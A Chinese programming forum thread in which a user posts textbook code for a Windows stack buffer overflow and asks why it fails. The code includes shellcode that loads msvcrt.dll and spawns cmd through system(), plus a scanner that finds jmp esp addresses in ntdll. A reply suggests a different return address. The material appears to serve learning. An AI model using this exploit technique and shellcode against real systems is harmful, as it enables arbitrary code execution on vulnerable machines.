这本书里有这样一段代码:
- C/C++ code
#include <stdio.h> #include <string.h> char name[] = "\x41\x41\x41\x41" "\x41\x41\x41\x41" //output[8] "\x41\x41\x41\x41" //ebp "\x1c\x80\xf5\x77"//0x77f5801c关于这个地址的由来参见下面获取jmp esp地址的代码 "\x55" //push ebp "\x8B\xEC" //mov ebp, esp "\x33\xC0" //xor eax, eax "\x50" //push eax "\x50" //push eax "\x50" //push eax "\xC6\x45\xF5\x6D" //mov byte ptr[ebp-0Bh], 6Dh "\xC6\x45\xF6\x73" //mov byte ptr[ebp-0Ah], 73h "\xC6\x45\xF7\x76" //mov byte ptr[ebp-09h], 76h "\xC6\x45\xF8\x63" //mov byte ptr[ebp-08h], 63h "\xC6\x45\xF9\x72" //mov byte ptr[ebp-07h], 72h "\xC6\x45\xFA\x74" //mov byte ptr[ebp-06h], 74h "\xC6\x45\xFB\x2E" //mov byte ptr[ebp-05h], 2Eh "\xC6\x45\xFC\x64" //mov byte ptr[ebp-04h], 64h "\xC6\x45\xFD\x6C" //mov byte ptr[ebp-03h], 6Ch "\xC6\x45\xFE\x6C" //mov byte ptr[ebp-02h], 6Ch "\x8D\x45\xF5" //lea eax, [ebp-0Bh] "\x50" //push eax "\xBA\x7B\x1D\x80\x7C" //mov edx, 0x7C801D7Bh "\xFF\xD2" //call edx "\x83\xC4\x0C" //add esp, 0Ch "\x8B\xEC" //mov ebp, esp "\x33\xC0" //xor eax, eax "\x50" //push eax "\x50" //push eax "\x50" //push eax "\xC6\x45\xFC\x63" //mov byte ptr[ebp-04h], 63h "\xC6\x45\xFD\x6D" //mov byte ptr[ebp-03h], 6Dh "\xC6\x45\xFE\x64" //mov byte ptr[ebp-02h], 64h "\x8D\x45\xFC" //lea eax, [ebp-04h] "\x50" //push eax "\xB8\xC7\x93\xBF\x77" //mov edx, 0x77BF93C7h "\xFF\xD0" //call edx "\x83\xC4\x10" //add esp, 10h "\x5D" //pop ebp "\x6A\x00" //push 0 "\xB8\xc7\x93\xbf\x77" //mov eax, 0x7c81cb12 "\xFF\xD0"; int i; void main() { char output[8]; strcpy(output, name); for(i=0;i<8&&output[i];i++) { printf("\\0x%x",output[i]); } }
这里的shellcode是启动一个cmd
偶用以下一段代码获取jmp esp的地址:
- C/C++ code
#include<windows.h> #include<iostream.h> #include<tchar.h> int main() { int nRetCode=0; bool we_load_it=false; HINSTANCE h; TCHAR dllname[]=_T("ntdll"); h=GetModuleHandle(dllname); if(h==NULL) {h=LoadLibrary(dllname); if(h==NULL) {cout<<"ERROR LOADING DLL:"<<dllname<<endl; return 1; } we_load_it=true; } BYTE* ptr=(BYTE*)h; bool done=false; for(int y=0;!done;y++) {try { if(ptr[y]==0xFF&&ptr[y+1]==0xE4) {int pos=(int)ptr+y; cout<<"OPCODE found at 0x"<<hex<<pos<<endl;}} catch(...) { cout<<"END OF"<<dllname<<"MEMORY REACHED"<<endl; done=true; } } if(we_load_it) FreeLibrary(h); return nRetCode; }
输出:
OPCODE found at 0x77f5801c
OPCODE found at 0x77f77343
END OFntdllMEMORY REACHED
Press any key to continue
偶在运行第一段代码时,
没有成功启动cmd,请大虾们解答,小弟将十分感谢。
------解决方案--------------------
不知你用的什么系统。。。。出现这种问题几乎都是JMP ESP和系统不符
你将"\x1c\x80\xf5\x77"改成下面我写的这个试试
- C/C++ code
"\x12\x45\xfa\x7f"